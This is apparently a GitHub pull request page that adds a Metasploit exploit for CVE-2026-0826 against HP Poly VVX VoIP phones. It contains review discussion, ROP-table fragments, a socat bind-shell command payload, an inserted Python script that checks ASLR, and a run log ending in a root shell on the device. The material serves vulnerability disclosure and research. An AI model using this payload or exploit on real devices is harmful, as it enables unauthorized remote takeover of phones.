Exploit module for HP Poly VVX (CVE-2026-0826) #21525
| def get_vvx_rop_table(version_str) | ||
| rop_tables = { | ||
| '6.4.7.4477' => { | ||
| # Even though /proc/sys/kernel/randomize_va_space is 1, all libraries are |
Now I'm curious as to why ASLR doesn't work :D
So am I. The SO libraries like libc-2.8.so are compiled with PIE so I expected them to be randomized per-boot, but that never happened. I spent some time looking at the kernel to see if something obvious was present, but I was not able to identify the cause.
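A cheap way to settle the question above, before reading kernel source, is to compare /proc/<pid>/maps dumps taken from separate boots and see which regions actually moved. With randomize_va_space=1 the kernel is supposed to randomize the mmap base, the stack and the vDSO (2 adds brk), so PIE shared objects should land at different bases each boot; if libc and ld.so come back at identical addresses while [stack] moves, mmap-base randomization is what is missing (one possibility worth ruling out on a 2.6.27 ARM kernel is that the architecture port did not yet implement it). The script below is an added example written for this page, not code from the PR or from Metasploit; the function names and the two maps dumps are constructed, with only the libc base 0x40a5c000 (the decimal 1084604416 that the module later prints as :libc_base) taken from this PR.

```python
import re
import sys
from typing import Dict, List

# One /proc/<pid>/maps line: start-end perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r'^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+'
    r'(?P<offset>\S+)\s+(?P<dev>\S+)\s+(?P<inode>\S+)\s*(?P<path>.*)$'
)


def mapping_bases(maps_text: str) -> Dict[str, int]:
    """Return {name: lowest start address} for every named mapping in a maps dump.

    Named means a file path (/lib/libc-2.8.so, the main binary) or a kernel
    pseudo-name such as [stack]; anonymous mappings are skipped.  Each name is
    reduced to the lowest start address of its segments, which is the value a
    ROP table would store as that library's base.
    """
    bases: Dict[str, int] = {}
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m:
            continue
        name = m.group('path').strip()
        if not name:
            continue
        start = int(m.group('start'), 16)
        bases[name] = min(start, bases.get(name, start))
    return bases


def fixed_mappings(samples: List[str]) -> Dict[str, int]:
    """Given maps dumps from separate processes (ideally separate boots),
    return the mappings whose base address never changed.

    Anything returned here is a region ASLR is not protecting on that host:
    a PIE shared object showing up here means mmap-base randomization is not
    happening, whatever randomize_va_space says.
    """
    if not samples:
        return {}
    per_sample = [mapping_bases(s) for s in samples]
    common = set.intersection(*(set(b) for b in per_sample))
    fixed: Dict[str, int] = {}
    for name in sorted(common):
        seen = {b[name] for b in per_sample}
        if len(seen) == 1:
            fixed[name] = seen.pop()
    return fixed


# Constructed maps dumps standing in for two boots of the phone.  Only the
# libc base (0x40a5c000 == 1084604416, the :libc_base the module prints) comes
# from the PR; every other address is made up.  The stack moves between boots,
# the non-PIE main binary, ld.so and libc do not.
BOOT_1 = """\
00008000-00010000 r-xp 00000000 1f:03 100 /usr/bin/app
40000000-4001b000 r-xp 00000000 1f:03 101 /lib/ld-2.8.so
40022000-40023000 rw-p 0001a000 1f:03 101 /lib/ld-2.8.so
40a5c000-40b7a000 r-xp 00000000 1f:03 102 /lib/libc-2.8.so
40b81000-40b83000 rw-p 0011d000 1f:03 102 /lib/libc-2.8.so
40b83000-40b86000 rw-p 00000000 00:00 0
bef3a000-bef4f000 rw-p 00000000 00:00 0 [stack]
"""

BOOT_2 = """\
00008000-00010000 r-xp 00000000 1f:03 100 /usr/bin/app
40000000-4001b000 r-xp 00000000 1f:03 101 /lib/ld-2.8.so
40022000-40023000 rw-p 0001a000 1f:03 101 /lib/ld-2.8.so
40a5c000-40b7a000 r-xp 00000000 1f:03 102 /lib/libc-2.8.so
40b81000-40b83000 rw-p 0011d000 1f:03 102 /lib/libc-2.8.so
40b83000-40b86000 rw-p 00000000 00:00 0
be9c1000-be9d6000 rw-p 00000000 00:00 0 [stack]
"""


def main(argv: List[str]) -> int:
    # Usage: python aslr_check.py maps_boot1.txt maps_boot2.txt ...
    # (copy /proc/<pid>/maps of the target daemon out of each boot first);
    # with no arguments the constructed samples above are used.
    samples = [open(p).read() for p in argv[1:]] or [BOOT_1, BOOT_2]
    fixed = fixed_mappings(samples)
    for name, base in fixed.items():
        print(f'{name}: base 0x{base:08x} identical in all {len(samples)} samples')
    # Non-zero exit if any shared object never moved, i.e. ASLR is not
    # covering the libraries even though the binaries are PIE.
    return 1 if any('.so' in name for name in fixed) else 0


if __name__ == '__main__':
    sys.exit(main(sys.argv))
```

Run it against dumps of the same daemon (the SIP process, since that is what the overflow lands in) captured across several reboots; a single process sampled twice within one boot only tells you whether per-exec randomization happens, not the per-boot behaviour the comment above is asking about.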
| disconnect_udp | ||
| end | ||
|
|
||
| def get_version |
If we want to cache it
| def get_version | |
| def get_version | |
| @version ||= _get_version | |
| end | |
| def _get_version |
Pull request overview
Adds a new Metasploit exploit module targeting HP Poly VVX/Trio VoIP devices vulnerable to CVE-2026-0826, along with a new socat-based bind TCP command payload and corresponding module documentation.
Changes:
- Introduces exploit/linux/misc/poly_unauth_rce_cve_2026_0826 (UDP/SIP SDP ICE attribute overflow with VVX 450 ROP table for 6.4.7.4477).
- Adds a new cmd/unix/bind_socat_tcp payload intended to provide a socat-backed bind shell.
- Adds end-user documentation for the new exploit module.
Impact Analysis:
- Blast radius: medium — new exploit/payload surfaces in module and payload catalogs; affects users selecting cmd/unix/bind_socat_tcp and running AutoCheck on the new exploit.
- Data and contract effects: low — no schema changes; new module/payload add new API surface (module/payload names/options) but do not modify existing ones.
- Rollback and test focus: rollback is straightforward (remove new files); focus validation on check behavior (Safe vs Unknown), version/model detection failure paths, and verifying the bind socat payload yields a usable interactive session.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 5 comments.
| File | Description |
|---|---|
| modules/payloads/singles/cmd/unix/bind_socat_tcp.rb | Adds a new socat-based bind TCP command-shell payload. |
| modules/exploits/linux/misc/poly_unauth_rce_cve_2026_0826.rb | Adds the CVE-2026-0826 unauth SIP/SDP ICE overflow exploit with a VVX 450 ROP table. |
| documentation/modules/exploit/linux/misc/poly_unauth_rce_cve_2026_0826.md | Adds operator-facing documentation and an example run for the new exploit. |
| Exploit::CheckCode::Safe(description) | ||
| end | ||
|
|
||
| CheckCode::Unknown |
|
|
||
| _, model_str, version_str = get_version | ||
|
|
||
| fail_with(Failure::UnexpectedReply, 'Failed to get target version') unless version_str || model_str |
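Review bot: the guard on the last line, `unless version_str || model_str`, only raises when both values are nil, so a partial detection result with just one of them nil falls through to the later `model_str.downcase` and ROP-table lookup and crashes with NoMethodError instead of failing cleanly; change it to `unless version_str && model_str` so the module requires both before continuing.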
| info, | ||
| 'Name' => 'HP Poly Voice Unauthenticated Remote Code Execution', | ||
| 'Description' => %q{ | ||
| CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting affect all |
| @@ -0,0 +1,87 @@ | |||
| ## Vulnerable Application | |||
| CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting affect all | |||
| # Returns the command string to use for execution | ||
| # | ||
| def command_string | ||
| "#{datastore['SocatPath']} tcp-l:#{datastore['LPORT']},fork exec:'#{datastore['BashPath']}'" |
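Review bot: `tcp-l:#{datastore['LPORT']},fork` keeps socat listening after the first client and starts a fresh shell for every later connection, which differs from how the other socat command payloads behave and leaves a listener on the device after the session is closed; drop `fork` so the listener exits with its single session, in line with the later revision of this payload.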
I added a7fc1af for a bunch of improvements to this socat payload. Tested to work on my HP Poly VVX 450 device. You now get an interactive login session, which is nicer:
msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > exploit
[+] /usr/local/bin/socat tcp-l:4444 exec:'/bin/sh',login,pty,stderr,setsid,sigint,sane
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
[*] cmd: /usr/local/bin/socat${IFS}tcp-l:4444${IFS}exec:'/bin/sh',login,pty,stderr,setsid,sigint,sane
[*] ROP Table: {:libc_base=>1084604416, :libc_gadget1=>87124, :libc_gadget2=>1031180, :libc_system=>227784, :libc_gadget4=>941044}
[*] Started bind TCP handler against 192.168.86.80:4444
[-] The connection was refused by the remote host (192.168.86.80:4444).
[*] Command shell session 1 opened (192.168.86.122:46697 -> 192.168.86.80:4444) at 2026-06-05 12:29:36 +0100
Shell Banner:
BusyBox v1.11.1 (2018-04-20 04:23:17 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
-/bin/sh: can't access tty; job control turned off
#
-----
# id
id
uid=0(root) gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.27.18 #1 PREEMPT Mon Jan 13 09:50:58 PST 2020 armv6l unknown
#
All the socat payloads would benefit from a review and standardization across how they operate and the advanced options they can (or cannot) accept.
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…allows one to be nil and can lead to NoMethodError on model_str.downcase or a nil ROP lookup. Impact: exploit can crash instead of failing cleanly when version detection is partial. Fix: require both values to be present. (Thanks Copilot)
… the vendor advisory. I don't have a Poly Trio device to test, but Recog has user agent strings we can use for the regex when pulling out the model and version info.
…l, avoids the encoding issue for the HP Poly module (leverages pty and login instead of " -li"), does not fork (which is in line with other socat payloads).
Overview
This pull request adds an exploit module for CVE-2026-0826, an unauthenticated stack-based buffer overflow affecting every model in the HP Poly VVX series, and the HP Poly Trio series of VoIP devices when they have the non-default ICE feature enabled. For more information on the vuln, see our Rapid7 disclosure blog or the vendor advisory.
The module currently supports a VVX 450 device with ROP gadgets for one recent version (6.4.7.4477), as that's what I have to test against. The device is a minimal embedded Linux system, and getting a payload to work was a pain. I could only leverage socat based payloads, and specifically I added a new cmd/unix/bind_socat_tcp payload which is verified to work.
Example